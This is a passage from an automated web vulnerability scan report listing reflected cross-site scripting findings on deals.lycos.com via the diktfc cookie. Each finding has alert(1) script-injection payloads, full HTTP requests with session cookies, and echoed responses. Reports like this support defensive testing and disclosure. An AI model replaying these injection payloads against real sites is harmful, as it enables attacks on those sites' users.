The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45c66"%3balert(1)//b6a939bc91 was submitted in the diktfc cookie. This input was echoed as 45c66";alert(1)//b6a939bc91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A45c66"%3balert(1)//b6a939bc91; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A45c66";alert(1)//b6a939bc91"
});
</script>
...[SNIP]...

1.199. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ae2"><script>alert(1)</script>ecb316bab89 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55ae2"><script>alert(1)</script>ecb316bab89; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55ae2"><script>alert(1)</script>ecb316bab89&amp;cj=1" alt="tracker" />
...[SNIP]...

1.200. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55068"%3balert(1)//77d4c7afd2 was submitted in the diktfc cookie. This input was echoed as 55068";alert(1)//77d4c7afd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55068"%3balert(1)//77d4c7afd2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55068";alert(1)//77d4c7afd2"
});
</script>
...[SNIP]...

1.201. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4fb5"%3balert(1)//cc77090642d was submitted in the diktfc cookie. This input was echoed as a4fb5";alert(1)//cc77090642d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa4fb5"%3balert(1)//cc77090642d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa4fb5";alert(1)//cc77090642d"
});
</script>
...[SNIP]...

1.202. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18fe"><script>alert(1)</script>50f5a41c6f0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab18fe"><script>alert(1)</script>50f5a41c6f0; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:09 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab18fe"><script>alert(1)</script>50f5a41c6f0&amp;cj=1" alt="tracker" />
...[SNIP]...

1.203. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cf6"%3balert(1)//17d3e5f2582 was submitted in the diktfc cookie. This input was echoed as 34cf6";alert(1)//17d3e5f2582 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34cf6"%3balert(1)//17d3e5f2582; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34cf6";alert(1)//17d3e5f2582"
});
</script>
...[SNIP]...

1.204. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57098"><script>alert(1)</script>17fbef7573c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57098"><script>alert(1)</script>17fbef7573c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57098"><script>alert(1)</script>17fbef7573c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.205. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-32-1080p-lcd-hdtv-for-399-414373

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1ca8"%3balert(1)//8f632b01aa9 was submitted in the diktfc cookie. This input was echoed as b1ca8";alert(1)//8f632b01aa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lg-32-1080p-lcd-hdtv-for-399-414373 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab1ca8"%3balert(1)//8f632b01aa9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ext/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab1ca8";alert(1)//8f632b01aa9"
});
</script>
...[SNIP]...

1.206. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-32-1080p-lcd-hdtv-for-399-414373

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec67"><script>alert(1)</script>28b95ad8bc4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lg-32-1080p-lcd-hdtv-for-399-414373 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6ec67"><script>alert(1)</script>28b95ad8bc4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
mg src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6ec67"><script>alert(1)</script>28b95ad8bc4&amp;cj=1" alt="tracker" />
...[SNIP]...

1.207. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-42-1080p-lcd-hdtv-for-479-414598

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cc41"><script>alert(1)</script>85a55a54eb2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lg-42-1080p-lcd-hdtv-for-479-414598 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2cc41"><script>alert(1)</script>85a55a54eb2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
mg src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2cc41"><script>alert(1)</script>85a55a54eb2&amp;cj=1" alt="tracker" />
...[SNIP]...

1.208. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-42-1080p-lcd-hdtv-for-479-414598

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb5d0"%3balert(1)//a5de5727a34 was submitted in the diktfc cookie. This input was echoed as eb5d0";alert(1)//a5de5727a34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lg-42-1080p-lcd-hdtv-for-479-414598 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb5d0"%3balert(1)//a5de5727a34; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17684

